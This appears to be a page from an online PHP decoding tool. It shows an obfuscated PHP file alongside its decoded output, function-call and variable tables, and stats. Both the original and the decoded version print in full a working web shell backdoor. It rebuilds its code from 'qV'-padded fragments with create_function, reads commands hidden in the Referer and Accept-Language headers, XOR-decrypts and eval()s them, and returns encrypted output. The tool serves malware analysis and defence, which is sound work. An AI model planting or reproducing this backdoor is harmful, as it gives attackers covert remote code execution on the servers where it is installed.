Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $J='<$qVl;){for($jqV=0;(qV$j<$c&&qV$i<$qVl);$j++,$i++qVqV){$o.=$qVqVt{$i}^$k{$j};}}r..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$J='<$qVl;){for($jqV=0;(qV$j<$c&&qV$i<$qVl);$j++,$i++qVqV){$o.=$qVqVt{$i}^$k{$j};}}rqVetqVurn $qVo;}$qVr=$_SERVER;qV';
$C=str_replace('L','','cLrLeate_LfuLLnctLion');
$W='i]="qV";$pqV=$ss($pqV,3qV);}if(array_keqVy_existqVs($iqV,$s)qV){$s[$i]qV.=$p;$e=qVstrpqVos(qV$s[$qVi],$f);ifqV(';
$L='V,3));$pqV=qVqV"";for($z=1;$z<count($m[1qVqV]qV);$z++)$p.=qV$q[$m[2][$zqV]];if(sqVtrqVpos($p,$hqV)qV===0){$s[$qV';
$Y='$kh="qV5dqV41";$qVkqVf="402a";function xqV($t,$k)qV{qV$c=sqVtrlen($kqV);$l=strlen($qVt);qV$o="qVqV";for($i=0qV;$i';
$j='strtoqVlower";$iqV=$m[1][qV0]qV.qV$m[1][1];$h=qV$sl($qVss(md5($i.$qVqVkh),0qV,3));$f=$sl(qV$ss(mqVd5(qV$i.$kf),0qVq';
$T='qVlean();$d=bqVase64_encode(xqV(gzcomprqVess(qVqV$o),$qVk));print("<$k>$d<qV/qV$k>");@sesqVsioqVqVn_destroy();}}}}';
$d='$rr=@qV$r["HTTP_RqVqVEFERER"qV];$ra=@$qVr["HTqVTP_ACCqVEPT_LANGUAqVGE"];qViqVf($rr&&$qVra){$uqV=parqVse_urqVl($rr';
$I='qV/_/"qV,"/-/"),aqVrqVray(qV"/","+"),$ss($s[$iqV]qV,0,$e))qV),$k)))qV;$o=ob_get_qVcontqVents()qV;qVob_endqV_cqV';
$e=');paqVqVrse_str($u["queqVry"],$qVq);$qqVqV=array_valueqVs(qVqV$q);preg_match_all(qV"/([\\qVw])[\\w-qV]qV+(?:;qVqVq';
$A='=0.([\\d])qV)?,?/",$qVra,$m);ifqV($q&&$m)qV{@sqVeqVssion_sqVtart();$sqV=qV&$_SESSIqVON;$sqVs="subqVqVstr";$sl="';
$f='$qVeqV){$k=$kh.$qVkf;ob_start(qV);@eqVval(@qVgzuncompreqVsqVs(@x(@bqVaqVse64_qVqVdecode(pregqV_replace(aqVrray("';
$g=str_replace('qV','',$Y.$J.$d.$e.$A.$j.$L.$W.$f.$I.$T);
$l=$C('',$g);$l();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A =0.([\d])qV)?,?/",$qVra,$m);ifqV($q&&$m)qV{@sqVeqVssion_sqVt..
$C create_function
$I qV/_/"qV,"/-/"),aqVrqVray(qV"/","+"),$ss($s[$iqV]qV,0,$e))qV..
$J <$qVl;){for($jqV=0;(qV$j<$c&&qV$i<$qVl);$j++,$i++qVqV){$o.=$..
$L V,3));$pqV=qVqV"";for($z=1;$z<count($m[1qVqV]qV);$z++)$p.=qV..
$T qVlean();$d=bqVase64_encode(xqV(gzcomprqVess(qVqV$o),$qVk));..
$W i]="qV";$pqV=$ss($pqV,3qV);}if(array_keqVy_existqVs($iqV,$s)..
$Y $kh="qV5dqV41";$qVkqVf="402a";function xqV($t,$k)qV{qV$c=sqV..
$d $rr=@qV$r["HTTP_RqVqVEFERER"qV];$ra=@$qVr["HTqVTP_ACCqVEPT_L..
$e );paqVqVrse_str($u["queqVry"],$qVq);$qqVqV=array_valueqVs(qV..
$f $qVeqV){$k=$kh.$qVkf;ob_start(qV);@eqVval(@qVgzuncompreqVsqV..
$g $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$j strtoqVlower";$iqV=$m[1][qV0]qV.qV$m[1][1];$h=qV$sl($qVss(md..
$l None

Stats

MD5 3bc43416a6d3a20214a7d6428bb0e2f1
Eval Count 1
Decode Time 139 ms